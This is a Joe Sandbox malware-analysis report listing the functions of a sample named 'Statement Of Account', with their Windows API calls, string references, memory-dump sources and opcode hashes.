Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Path$FullName_wcscpy$DesktopFolderFromListMalloc_memset
String ID: $OH$@OH$X
API String ID: 1198364232-1394974532
Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A

Function 00424F47 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0041AEF9), ref: 00424F4C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00424F5C

Strings

IsProcessorFeaturePresent, xrefs: 00424F56
KERNEL32, xrefs: 00424F47

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: e8a2c195ee76dfd59a84a35b1cdf9e15a3b06e47dea4a5400648535d534bf17f
Instruction ID: 69bd3651b8917f7fc34e3109133611cda39c57594410afc054872b2319d2a534
Opcode Fuzzy Hash: e8a2c195ee76dfd59a84a35b1cdf9e15a3b06e47dea4a5400648535d534bf17f
Instruction Fuzzy Hash: F7F03030A00A19D2DB006FB1FE1A66F7AB5FBC0B43F920895E591A0084DFB58571838A

Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004342D1
CoTaskMemAlloc.COMBASE(00000001), ref: 004342DD

Strings

hkG, xrefs: 004342AE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AllocTask_wcslen
String ID: hkG
API String ID: 2651040394-3610518997
Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5

Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C

Strings

GetSystemWow64DirectoryW, xrefs: 00434186
kernel32.dll, xrefs: 00434175

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8

Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0

Strings

IcmpSendEcho, xrefs: 004343EA
ICMP.DLL, xrefs: 004343D9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpSendEcho
API String ID: 2574300362-58917771
Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79

Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F

Strings

IcmpCloseHandle, xrefs: 00434419
ICMP.DLL, xrefs: 00434408

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCloseHandle
API String ID: 2574300362-3530519716
Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39

Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E

Strings

ICMP.DLL, xrefs: 00434437
IcmpCreateFile, xrefs: 00434448

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCreateFile
API String ID: 2574300362-275556492
Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29

Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D

Strings

IsWow64Process, xrefs: 0040EE87
kernel32.dll, xrefs: 0040EE76

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28

Function 0040EEE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD

Strings

GetNativeSystemInfo, xrefs: 0040EEF7
kernel32.dll, xrefs: 0040EEE6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C

Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042EEE5

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d2d12c55b876e5fa1efbcf51686f09b2c55b87fd727dd21d929d390e382c4fef
Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
Opcode Fuzzy Hash: d2d12c55b876e5fa1efbcf51686f09b2c55b87fd727dd21d929d390e382c4fef
Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A

Function 00461F2E Relevance: 6.2, APIs: 4, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789b5fd3fb57cd1fdd1943e69ab52484ae89d1411cf2d9ff0716a14a2cf4af02
Instruction ID: bea81a4e29fd63c59bfadab5d98c0db62be6adcbe4d804fc8d794e44fc363b5a
Opcode Fuzzy Hash: 789b5fd3fb57cd1fdd1943e69ab52484ae89d1411cf2d9ff0716a14a2cf4af02
Instruction Fuzzy Hash: 6671BD70208701BBD724CA15C984FABB7E8EB8A744F14490EF58597391E7B8AC45CB6B

Function 00468F1E Relevance: 6.1, APIs: 4, Instructions: 144windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00468F7C
__itow.LIBCMT ref: 00468FBD

Part of subcall function 004610CB: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0046114D

SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469038
__itow.LIBCMT ref: 0046909F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 6e47951fcf4712585c244f1dfe2b28078b4dd7be5086c6a9f29add8b9ffa0b86
Instruction ID: 3271f2b780b50099ef266a7e1ca8c19dfe2923c7f184821f87219ee34da58f28
Opcode Fuzzy Hash: 6e47951fcf4712585c244f1dfe2b28078b4dd7be5086c6a9f29add8b9ffa0b86
Instruction Fuzzy Hash: C441A571604300ABD624EF55D941FAF73E8AF88714F00091EFA8567281EB79AD09C76B

Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00414630
__fileno.LIBCMT ref: 00414650
__locking.LIBCMT ref: 00414657
__flsbuf.LIBCMT ref: 00414682

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48

Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
VariantCopy.OLEAUT32(?,?), ref: 00478259
VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CopyVariant$ErrorLast
String ID:
API String ID: 2286883814-0
Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99

Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(00000000,?), ref: 00441CDE
GetWindowRect.USER32(?,?), ref: 00441D5A
PtInRect.USER32(?,?,?), ref: 00441D6F
MessageBeep.USER32(00000000), ref: 00441DF2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5

Function 00449063 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
InvalidateRect.USER32(?,00000000,00000001), ref: 00449124

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$InvalidateRect
String ID:
API String ID: 2778011698-0
Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
